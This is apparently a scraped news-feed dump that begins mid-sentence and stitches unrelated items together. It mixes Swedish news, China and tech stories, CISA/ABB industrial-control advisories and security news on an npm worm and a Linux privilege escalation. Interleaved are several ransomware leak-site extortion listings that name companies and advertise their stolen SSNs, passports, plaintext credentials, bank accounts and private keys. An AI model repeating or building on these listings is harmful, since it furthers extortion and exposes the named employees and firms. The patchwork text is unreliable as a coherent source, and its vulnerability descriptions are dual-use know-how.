mass exploitation (Verizon DBIR 2025). Supply chain breaches doubled, now representing 30% of all incidents. Ransomware appeared in 44% of breaches – up 37% from the prior year.Security leaders operating in this environment face an expectation that compliance teams were not designed to meet alone: continuous proof that controls are effective against adversaries who operate at machine speed. When AI agents can autonomously chain every phase of an attack with minimal human oversight, a quarterly audit cycle is not an assurance, but a historical record.Why Cyber GRC matters nowBoards are no longer satisfied with compliance status reports. They want dollarized risk scenarios and evidence that remediation is actually reducing exposure -- not just that it was attempted.Two pressures are converging. First, environmental complexity: modern infrastructure spans cloud, SaaS, remote endpoints, OT systems, and third-party providers. The perimeter is everywhere, and so is the attack surface. Second, regulatory expectation: SEC, NIS2, DORA, and CMMC now require demonstrable control effectiveness, not just documented policies. Both pressures demand a model that brings security activity, compliance readiness, and accountability into the same view.What Cyber GRC changes for security and compliance teamsCyber GRC changes how organizations use security data. Instead of disconnected, point-in-time artifacts, it enables teams to build governance and compliance workflows directly on top of real security telemetry – so evidence reflects the current state of the environment, not a snapshot assembled weeks before an audit.In practice, this means connecting findings, controls, remediation activity, and evidence so teams can see what issues exist, who owns the response, how remediation is progressing, and what that means for overall readiness. This also helps address the compliance-theater problem directly: many programs are designed to pass audits rather than reduce actual exposure, creating false confidence and misallocated resources. Grounding compliance evidence in live security telemetry -- rather than manual documentation -- means teams can tell the difference between controls that are configured and controls that are working.How connected security data strengthens complianceCompliance has historically been treated as a separate process that happens alongside security operations. In practice, it depends on the same data. The telemetry that surfaces a critical finding also determines whether a control is operating effectively.When evidence is generated directly from operational systems, teams spend less time assembling reports and more time improving controls. Continuous monitoring for control drift allows organizations to move from reactive audit preparation toward a consistent assurance model. Third-party risk -- now a source of 30% of all breaches -- benefits particularly, since continuous TPRM monitoring surfaces supply chain exposure in real time rather than at the next assessment cycle.How Rapid7 Cyber GRC builds on existing security workflowsThis shift does not require rebuilding security programs from the ground up. With the launch of Rapid7 Cyber GRC, customers can use the security data and workflows already connected through the Command Platform to support audits, assessments, and ongoing control validation. Capabilities such as HITRUST E1 control coverage provide continuous monitoring and automated evidence collection, while features like audit-ready user access exports and unified policy data reduce manual effort across SOC 2, NIST CSF, PAI, and other common frameworks.When NIST CSF 2.0, MITRE ATT&CK, and FAIR-based risk quantification inform the evidence model rather than just the policy library, compliance becomes a byproduct of strong security operations -- not a parallel burden.Rapid7 is launching Cyber GRC to connect security operations, risk, and complianceOrganizations do not need more disconnected processes for managing risk. They need a way to connect what they detect, what they fix, and what they can prove in a way that stands up to regulatory scrutiny, board-level oversight -- and keeps pace with adversaries who operate at AI speed.That is why Rapid7 is launching Cyber GRC: to help customers bring security operations, governance, and compliance into a single, continuous view so teams can reduce risk, improve readiness, and demonstrate progress with confidence.For current clients, reach out to your account team to get early access to Rapid7's Cyber GRC solution and help shape what comes next.⠀Sources: IBM Cost of a Data Breach Report 2025 | Rapid7’s 2026 Global Threat Landscape Report | Verizon DBIR 2025

Finlands bidrag i Eurovision har toppat alla oddslistor och förväntningarna är höga. Pekka Heino, som kommenterade tävlingen när Finland tog sin historiska seger för 20 år sedan, hoppas på att historien upprepar sig i år. – Jag accepterar inget annat än en finsk seger. Men i Eurovision finns alltid risken att om någon är för stor favorit så röstar folk på något annat.

För två år sedan uppstod ett bråk i Skinnskatteberg mellan de då socialdemokratiska partikamraterna Arne Hjorth och Christine Andersen. Bråket slutade med en svingad väska och en polisanmälan. Nu frias Andersen från misshandel.

Kriminalvårdens anstalt i Sagsjön i Lindome stängdes under tisdagseftermiddagen ned efter att medarbetare hittat vitt pulver utanpå ett kuvert vid en postgranskning. Pulvret visade sig vara rengöringsmedel.

Think tank warns outsider access to powerful models is governed by patchy controls and a hope nobody dangerous gets in

Manhattan Broadcasting Company is a leading source of local and regional news, sports, weather, and entertainment in Northeast Kansas, engaging over 100,000 listeners weekly. We will upload of corporate data soon. Employee personal informatics, contracts, lots of pictur es and other files.

Cybersecurity researchers have flagged a new version of the TrickMo Android banking trojan that uses The Open Network (TON) for command-and-control (C2). The new variant, observed by ThreatFabric between January and February 2026, has been observed actively targeting banking and cryptocurrency wallet users in France, Italy, and Austria. "TrickMo relies on a runtime-loaded APK (dex.module),

Flera mystiska sjukdomsfall har stoppat arbetet med det nya elektrostålverket på SSAB i Luleå. Kommunalrådet Carina Sammeli (S) ser allvarligt på situationen – men är än så länge inte särskilt uppjagad. – Det oroar nog SSAB och dess underleverantörer mer än oss, säger hon till SVT.

In a conference centre in The Hague last October, a roomful of Asia-watching European officials and experts were gathered for a symposium on relations with China when news broke that Beijing was expanding export controls on rare earths and other minerals. Crucially, there was now an extraterritorial element: China could deny exports not only to direct buyers, but also restrict products made in third countries if they contained Chinese-origin rare earth content or controlled inputs. In practice,...

As US President Donald Trump prepares to visit China, Taiwan is again one of the most sensitive issues in US-China relations. For Washington, this is not only a question about the Taiwan Strait. It is a strategic choice that bears on whether the United States can avoid a comprehensive conflict with China, stabilise markets and secure Chinese cooperation on trade, artificial intelligence (AI), Iran and the wider Middle East. This could be the moment when a clear US stance against Taiwan...

A new driver expected to land in the upcoming Linux 7.2 kernel is the ARCTIC Fan Controller driver to allow fan speed monitoring and PWM controls for this upcoming ARCTIC product. Making this new driver all the more exciting is that it was worked on by ARCTIC directly compared to the typical workflow for such desktop/consumer hardware peripherals often being left up to the reverse-engineering, open-source community...

Vision 3 Architects is a collaborative and responsive design studio specializing in architectur e and interior design projects. They focus on crafting spaces that reflect each client's vision and values, ensuring a design environment that fosters creativity and collaboration. We will upload 31gb of corporate data soon. Detailed employee personal information (passports, DLs, SSNs and so on), contracts and agreements, client information, projects, NDAs, etc.

Det har beskrivits som en avrättning och kallats ett av de värsta dåden i Uppsala i modern tid. Nu döms en 21-årig man till livstids fängelse det brutala trippelmordet.

View CSAF Summary ABB became aware of vulnerability in the products versions listed as affected in the advisory. An update is available that resolves publicly reported vulnerability. An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution. The following versions of ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax are affected: AC500 V3 PM5xxx 3.9.0, 3.9.0_HF1 CVSS Vendor Equipment Vulnerabilities v3 9.8 ABB ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax Out-of-bounds Write Background Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-15467 When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk. View CVE Details Affected Products ABB AC500 V3 Stack Buffer Overflow in Cryptographic Message Syntax Vendor:ABB Product Version:ABB AC500 V3 PM5xxx Firmware Version 3.9.0 Product Status:fixed, known_affected Remediations Vendor fixThe problem is corrected in the following product version: - AC500 V3 firmware version 3.9.0 HF1 ABB recommends that customers apply the update at earliest convenience. This firmware version is released for all AC500 V3 PLC types and available for download from the ABB library. https://search.abb.com/library/Download.aspx?DocumentID=3ADR011537&LanguageCode=en&DocumentPartId=&Action=Launch MitigationRefer to section “General security recommendations” for further advise on how to keep your system secure. WorkaroundNo workarounds are available Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C Acknowledgments ABB PSIRT reported this vulnerability to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What causes the vulnerability? - Parsing CMS AuthEnvelopedData or EnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. What is AC500 V3? - The AC500 V3 is a scalable range of Programmable Logic Controller (PLC). It provides solutions for small, medium and high-end applications. The AC500 V3 platform offers different performance levels and is the ideal choice for high availability, extreme environments, condition monitoring, motion control or safety solutions. It offers interoperability and compatibility in hardware and software from compact PLCs up to high end and safety PLCs. What might an attacker use the vulnerability to do? - An attacker who successfully exploited these vulnerabilities could cause a crash, denial-of-service (DoS), or potentially remote code execution. How could an attacker exploit the vulnerability? - Refer to section “Vulnerability severity and details“. Could the vulnerability be exploited remotely? - Yes, an attacker who has network access to an affected system node could exploit the vulnerabilities. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. When this security advisory was issued, had this vulnerability been publicly disclosed? - Yes, the vulnerabilities have been publicly disclosed. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 3ADR011536 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-03-12 Date Revision Summary 2026-03-12 1 Initial version. 2026-05-12 2 Initial CISA Republication of ABB PSIRT 3ADR011536 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of these vulnerabilities could allow an authenticated attacker to expose sensitive information or cause a CRLF injection. The following versions of Subnet Solutions PowerSYSTEM Center are affected: PowerSYSTEM Center 2020 =5.8.x|=5.11.x|=6.0.x|=5.8.x|=6.0.x|=5.11.x|=6.0.x|

CISA and the Group of Seven (G7) international partners—Germany, Canada, France, Italy, Japan, the United Kingdom, and the European Union—have released joint guidance, Software Bill of Materials for AI – Minimum Elements, to help public and private sector stakeholders improve transparency in their artificial intelligence (AI) systems and supply chains. A software bill of materials (SBOM) acts as an “ingredients list” for software that better positions organizations to understand their supply chains and make risk-informed decisions about how to protect their critical systems. The guidance builds on CISA’s previous work with federal and international partners to establish a shared vision for a software bill of materials and provides recommendations on minimum elements that should be included in an SBOM for AI. Because AI systems are software systems, these recommendations should be considered in addition to the general minimum elements for an SBOM. While not exhaustive or mandatory, the supplemental minimal elements outlined in this guidance reflect the consensus of G7 experts and will expand over time to keep pace with the rapid advancement of AI technology. Please share your thoughts! We welcome your feedback. CISA Product Survey

View CSAF Summary ABB became aware of multiple internally discovered vulnerabilities in the WebPro SNMP card PowerValue for the product versions listed as affected in the advisory. Depending upon the vulnerability, an attacker with access to local network who successfully exploited this vulnerability could have - Unauthorized access - Insufficient Session Expiration leading to resource unavailability - Uncontrolled Resource Consumption leading to DOS attack ABB strongly advises customers to update the latest firmware of affected products. The following versions of ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities are affected: WebPro SNMP Card

View CSAF Summary ABB became aware of severe vulnerability in the products versions listed as affected in the advisory. An update is available that resolves these vulnerabilities. An attacker who successfully exploited these vulnerabilities could bypass the user management and read visualization files (CVE-2025-2595), read and write certificates and keys (CVE-2025-41659) or cause a denial-of-service (DoS) (CVE-2025-41691). The following versions of ABB AC500 V3 Multiple Vulnerabilities are affected: AC500 V3

View CSAF Summary ABB became aware of severe vulnerability in the products versions listed as affected in the advisory. The Windows gateway is accessible remotely by default. Unauthenticated attackers can therefore search for PLCs, but the user management of the PLCs prevents the actual access to the PLCs – unless it is disabled The following versions of ABB Automation Builder Gateway for Windows are affected: Automation Builder

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to elevate privileges from user to system, which may then enable the attacker to cause a temporary denial of service, open files, or delete files. The following versions of Fuji Electric Tellus are affected: Tellus 5.0.2 CVSS Vendor Equipment Vulnerabilities v3 7.8 Fuji Electric Fuji Electric Tellus Exposed Dangerous Method or Function Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Japan Vulnerabilities Expand All + CVE-2026-8108 The installation of Fuji Tellus adds a driver to the kernel which grants all users read and write permissions. View CVE Details Affected Products Fuji Electric Tellus Vendor:Fuji Electric Product Version:Fuji Electric Tellus: 5.0.2 Product Status:known_affected Remediations Vendor fixFuji Electric recommends that Tellus be installed only with administrator privileges. Relevant CWE: CWE-749 Exposed Dangerous Method or Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Acknowledgments Kim Myung-gyu of Trend Micro Zero Day Initiative reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Initial Publication Legal Notice and Terms of Use

As part of Dark Reading's 20th anniversary special coverage, we profile the CISOs, founders, researchers, criminals, and policymakers who rewrote the enterprise risk playbook.

Six-minute supply chain blitz pushed 84 malicious versions with credential theft and disk-wiping code

Why do the Riskiest SOC Alerts Go Unanswered? Security operations teams are drowning in alerts. But the real problem isn't always alert volume; it's the blind spots. The most dangerous alerts are the ones no one is investigating. A recent report from The Hacker News examined why certain high-risk alert categories - WAF, DLP, OT/IoT, dark web intelligence, and supply chain signals- consistently

Polisen begick misstag i utredningen av Katja Nyberg – bland annat råkade en polis slänga det så kallade ”snortröret” i en soptunna. Den tidigare SD-ledamotens advokat Martin Orler är kritisk: – Det är inte betryggande att avgörande bevisbeslag hanterats som tuggummipapper, säger han.

Tre döda på kryssningsfartyget MV Hondius, evakuering, isolering, smittspårning – nyhetsbevakningen om hantaviruset är intensiv. Samtidigt sprids rykten, falska påståenden och konspirationsteorier i sociala medier. SVT har tittat närmare på fyra av dem.

TeamPCP, the threat actor behind the recentsupply chain attack spree, has been linked to the compromise of the npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI as part of a fresh Mini Shai-Hulud campaign. The affected npm packages have been modified to include an obfuscated JavaScript file ("router_init.js") that's designed to profile the execution

Knapp seger för Alingsås U – 3–2 mot Vartofta Alingsås Tidning

Brett Ratner, director of the documentary Melania and the Rush Hour franchise, is travelling to China as part of US President Donald Trump’s delegation, sources familiar with the filmmaker’s plans have told the South China Morning Post. During the three-day trip, which begins on Wednesday, Ratner intends to advance preparations for the action-comedy franchise’s latest sequel, Rush Hour 4, including meetings with crew members, actors and potential Chinese film distribution partners. He is also...

Mozilla claims the Digital Markets Act delivered lasting bump, invites Britain to do similar

För en vecka sedan rapporterade vi att lärplattformen Canvas hackats, något som gjort att personuppgifter från 275 miljoner användare hamnat i orätta händer. Nu låter Instructure, företaget bakom Canvas, meddela att man har gjort en ”deal” med hackarna. – Även om det aldrig finns fullständig säkerhet när man har att göra med cyberbrottslingar anser vi att det var viktigt att vidta alla steg i vår makt för att ge kunderna ytterligare sinnesro i den mån det är möjligt, skriver Instructure på sin webbplats. Med andra ord tycks det som om Instructure valt att betala den begärda lösensumman, vilket går emot den allmänna rekommendationen från polismyndigheter att aldrig gå med på den här sortens utpressning. Enligt The New York Times ska hackargruppen Shiny Hunters ha lovat att radera de stulna uppgifterna efter överenskommelsen och inte använda dem för att utpressa enskilda användare. Canvas används av ett 30-tal svenska universitet och högskolor, däribland Göteborgs universitet, Lunds universitet, Stockholms universitet, Uppsala universitet, Chalmers och KTH.

Under måndagen lanserades Open AI Deployment Company, ett nytt företag som ska hjälpa organisationer att implementera AI-system. Tanken är att Open AI Deployment Company ska skicka ut så kallade ”Forward Deployed Engineers” till kunderna, det vill säga kompetenta utvecklare som kan implementera tekniska lösningar utifrån kundernas egna behov. Open AI Deployment Company baseras på Tomoro, ett företag med 150 anställda som Open AI lagt vantarna på. Tack vare samarbetspartners som TPG, Advent, Bain Capital, Brookfield, Goldman Sachs och Softbank Corp har Open AI Deployment Company fått ihop ett startkapital på 4 miljarder dollar, något som ska se till att företaget får en bra start. Även konsultjättar som Bain & Co, Capgemini och McKinsey är knutna till projektet. Totalt ingår 19 partnerbolag. Nyligen lanserade även Anthropic ett nytt bolag för företagstjänster.

Google Threat Intelligence Group (GTIG) varnar för att hackare nu använder sig av AI både för att hitta sårbarheter och sedan skapa skadeprogram för att aktivt utnyttja sårbarheterna i fråga. Upptäckten gjordes i samband med en närmare analys av Operation Overload, en kampanj som pro-ryska hackare står bakom. – Vår analys av sårbarheter associerade med denna kampanj identifierade en nolldagarssårbarhet implementerad i ett Python-skript som gör det möjligt att kringgå tvåfaktorsautentisering (2FA) för ett populärt webbaserat systemadministrationsverktyg som baseras på öppen källkod, skriver GTIG i ett inlägg på den officiella Google Cloud-bloggen. Enligt våra kollegor på CSO Online framgår det inte vilket systemadministrationsverktyg det rör sig om, men berörda parter ska ha informerats om händelsen.

Inredningsdesignern Marie Olsson Nylander ersätter Anne Lundberg i SVT:s ”Husdrömmar”.

Avanti Windows & Doors — a vinyl window manufacturer headquartered in El Mirage, Arizona, with regional offices across Nevada, Texas, California, and Florida. The exposed material includes: Plaintext SQL Server SA (system administrator) credentials — the master key to the FeneVision ERP database containing every customer order, every price, every financial record the company has ever processed. Employee SSNs, W-4s, I-9s, and E-Verify data — the complete identity package for the entire workforce, from new-hire packets through payroll records spanning 2014–2016+. 1099-MISC/INT forms — SSNs/EINs and payment amounts for 50–200+ contractors and vendors across two tax years. Direct deposit authorizations — bank account and routing numbers for employees who enrolled in ACH payroll. 24+ months of Chase bank statements and 28 months of AMEX corporate card statements — full account numbers, transaction details, and spending patterns. The complete proprietary pricing algorithm — source code for the FastAPI backend that determines window pricing for every builder contract, plus 41+ builder Master Service Agreements with exact pricing terms. CPA-reviewed financial statements, partnership returns, K-1s, and budget forecasts — the company’s full financial anatomy, from cost structure to profit allocation. OSHA 300 logs, workers’ compensation audit files, and UHC health insurance invoices — employee medical and injury data, names of injured workers, treatment details. Attorney-client privileged ADOSH settlement correspondence — OSHA settlement negotiations between outside counsel and the CEO. ~80 Windows roaming profiles — employee desktops, documents, AppData, Outlook .ost/.pst files, browser caches, and cached credentials.

Hundreds of npm packages infected by the self-propagating, credential-stealing worm from TeamPCP are related to the open source TanStack ecosystem.

This is the worst Linux vulnerability in years. TL;DR copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC. It abuses the kernel crypto API (AF_ALG sockets) plus splice() to write four bytes at a time straight into the page cache of a file the attacker does not own. The exploit works unmodified across Ubuntu, RHEL, Debian, SUSE, Amazon Linux, Fedora and most others. No race condition, no per-distro offsets. The file on disk is never modified. AIDE, Tripwire and checksum-based monitoring see nothing. ...

En stor skrothög i Skelleftehamn började brinna under tisdagen. Det var kraftig rökutveckling på platsen och boende varnades.

SpaceX cleared an important milestone Monday on the road to launching a new version of Starship.

Article URL: https://www.cnbc.com/2026/05/12/tiktok-instagram-social-media-addictive-eu-crack-down.html Comments URL: https://news.ycombinator.com/item?id=48106534 Points: 505 # Comments: 455

It looks like you're trying to get more Microsoft 365 users to engage with your assistant. Would you like help?

https://www.reddit.com/r/canvas/comments/1taj9mk/instructure_just_confirmed_they_paid_the_ransom/ "We received assurances that it will not be further shared on the dark web or elsewhere, and we received proof that any copies of that data were deleted. Further, we have been informed that no Instructure customers will be extorted as a result of this incident" Obviously they have no business running a large technology based infrastructure. Inability to secure said infrastructure, then they honestly believe what they just said above. They'll be hit again in the next 6 to 12 months, bookmark this post. submitted by /u/xendr0me [link] [comments]

En man i 20-årsåldern dödades i samband med ett bråk i centrala Kristianstad under lördagskvällen. Tre av de fem misstänkta häktades under tisdagen och de två andra gripna släpptes under onsdagen på fri fot.

Söndagens SM i roadracing fick avbrytas efter en tragisk olycka där en man omkom efter en kollision på Falkenbergs motorbana. Totalt tre motorcyklar var inblandade i händelsen. Se hur olyckan skedde med grafik som SVT tagit fram, utifrån video som filmade förloppet.

Agentic AI is already running in production environments across many organizations today. It is executing tasks, consuming data, and taking actions — most likely without meaningful involvement from the security team. The industry conversation has largely framed this as a question of policy: allow it, restrict it, or monitor it? However, that framing misses the point. The more urgent

Prominent Linux kernel engineer Peter Zijlstra of Intel has been working on a set of scheduler patches to help with enhancing the behavior and delivering better results, especially for aging hardware he described as a "potato" -- an Intel Sandy Bridge desktop CPU with AMD Radeon RX 580 Polaris graphics. Benchmark results are promising from this work for gaming on old hardware while other workloads may ultimately stand to benefit too...

Customers left staring at restart plea with no keyboard, mouse, or hope

Israels vara eller icke vara som deltagare i Eurovision song contest har blivit en allt hetare potatis sedan kriget i Gaza inleddes. När Sveriges artist Felicia uttalade sig om Israel kontaktades hon av arrangören EBU. Nu svarar Eurovisionchefen på hur tävlingen ser på artisternas yttrandefrihet.

Fresh off the milestone of Dell and Lenovo becoming premier sponsors of the Linux Vendor Firmware Service (LVFS), there is a new feature release of the Fwupd firmware updating tool for Linux systems...

For years Intel has been developing the Low Power Mode Daemon "LPMD" to help their hybrid laptop and desktop CPUs deliver optimal power efficiency under Linux. Intel LPMD leverages hardware hints and other features for optimizing active idle power of the processor and putting the system into lower power modes where possible. This tool could soon call the Linux kernel source tree its new home...

US business leaders accompanying President Donald Trump on his state visit to Beijing will be given the opportunity to mingle with their Chinese counterparts at an exclusive international business club, according to sources. On Monday, the White House released a list naming dozens of business chiefs accompanying Trump, including high-profile figures such as Tesla chief executive Elon Musk and Apple’s Tim Cook. Two sources familiar with the arrangement said the Capital Club Beijing had been...

Jiangsu Hengrui Pharmaceutical, China’s largest drug company by market capitalisation, has signed a global collaboration and licensing agreement with US pharmaceutical giant Bristol Myers Squibb (BMS) worth up to US$15.2 billion. Hengrui’s Hong Kong-traded shares climbed 5.3 per cent to HK$69.55 on Tuesday, while its Shenzhen stock rose 4.84 per cent to 56.11 yuan. The deal adds credibility to China’s growing reputation for innovative drug development. Industry players, however, said the country...

Polisen fattade misstankar mot Katja Nyberg när hon ”förde upp fingrarna mot sin näsa” i arresten. I förhör säger den tidigare SD-ledamoten att hon har varit på en ”livlig fest” där hon inte hade uppsikt över sin handväska. Hon får också frågor om tiden i ravekommissionen – där hon jagade partyknarkare på 90-talet.

NaRaYa is a famous Thai brand recognized worldwide for its distinctive fabric bags and accessories. Founded in 1989, it has grown into one of Asia's most influential brands, specializing in high-quality, handcrafted products that showcase Thai crafts

Company operates a large-scale sugar mill and refinery in the Saraburi province, producing various types of sugar for both domestic and export markets.

The open-source Haiku operating system inspired by BeOS is now seeing multi-core symmetric multi-processing (SMP) support on ARM64 that works at least in a virtualized world. Plus an assortment of other improvements made to this open-source OS over the course of April...

En man åtalas misstänkt för att ha stulit över en miljon kronor från en idrottsförening i Skellefteå. Mannen har enligt åtalet vid upprepade tillfällen fört över pengar till sitt eget konto. – Personer i föreningen som började fundera på vart alla pengar försvann, säger åklagare Peter Jonsson.

Startec Group of Companies, a privately held Calgary-based industrial OEM founded in 1976 by Joe Cawthorn. Startec designs, fabricates, installs, and services compression, process, and refrigeration systems for oil-and-gas operators and the energy-transition sector (RNG, hydrogen, CO&sub2; sequestration, flare-gas capture). The company employs ~270 people and exports ~80% of its cleantech output to US customers including Pembina, ARC Resources, SemCAMS, Cenovus, and Shell. The exposed material spans the entire corporate knowledge base: 25 years of payroll (2001–2026) including a master SIN VERIFICATION.xlsx register, ADP exports, T4/ROE/T2200 forms, banking/EFT direct-deposit data for ~600+ current and former employees 18+ named passport scans plus a Pakistan resume-and-passport applicant pool (~20+) Wildcard TLS private keys for *.startec.ca (2022–2027 series) and the suspected Active-Directory-integrated internal CA private key The cyber-insurance policy (BZA2151) and the Nov 2025 Statement of Values & Business-Interruption submission to Zurich ~25+ named customer engineering libraries (Pembina, ARC, SemCAMS, Cenovus, Shell Scotford) with process specs, as-built drawings, and sizing calculations Shell Caroline + Shell Saturn dispute-counsel files (~665 MB of privileged litigation material) 12 fiscal years of board packs including “in camera” sessions, the 2020 Valuation Report, family-trust T3 returns, and succession-planning documents Cawthorn family QuickBooks files (live .QBW — full chart of accounts, general ledger, every transaction) 11 Outlook PST mailboxes (several multi-GB — named ex-employees' complete email history) Physical-security access codes (CCTV passwords, Telsco alarm chart, all-doors key record)

[warehouse] NorthWest Handling Systems — a 55-year-old forklift and warehouse equipment company headquartered in Renton, Washington, with branches across WA, OR, and AK. The dump is the entire corporate file share going back to 1988. 337,000+ files spanning every branch, every department, every era of the company. It includes: Plaintext credit card numbers in an Excel spreadsheet literally titled “C.O.D. info (CREDIT CARD INFO).xlsx” — stored at the root of the file server, unencrypted, for years. Social Security numbers and Taxpayer IDs on W-9 forms and certified payroll documents for government-contract work (USPS, Oregon DHS, public schools). 3+ years of plaintext passwords for Target Corporation’s vendor portal (TARS), stored in Word documents titled “TARGET PASSWORD & SECURITY QUESTIONS.” Each password rotation was saved as a new file. Home Depot Maximo DC billing credentials — plaintext, in a Word document, enabling fraudulent invoicing against a Fortune 50 company. Albertsons/Safeway Corrigo facility-management portal credentials — again, plaintext in a .docx file. 33 GB of customer warehouse CAD files — facility layouts, equipment placement, security-zone dimensions, and fire-protection drawings for approximately 50–200 companies including Nike, Google, Costco, and Umpqua Bank. 24,669 rows of fixed-asset data in ExportFile.csv — the complete equipment inventory, revealing the company’s financial structure, depreciation schedules, and capital-investment history. Corporate bank routing and account numbers (ACH authorization forms), employee direct-deposit details, time cards, disciplinary records, accident reports, and decades of invoices.

After years of stopping dead at the green bubble border, iPhone and Android users can finally send E2EE messages without relying on third-party apps

Flodman avslöjar: AHK-stjärnorna spelade med fotskador Alingsås Tidning

Den man i 25-årsåldern som misstänks för 17 fall av sexuellt ofredande häktades under tisdagen för grovt hemfridsbrott.

Article URL: https://matklad.github.io/2026/05/12/software-architecture.html Comments URL: https://news.ycombinator.com/item?id=48106024 Points: 573 # Comments: 111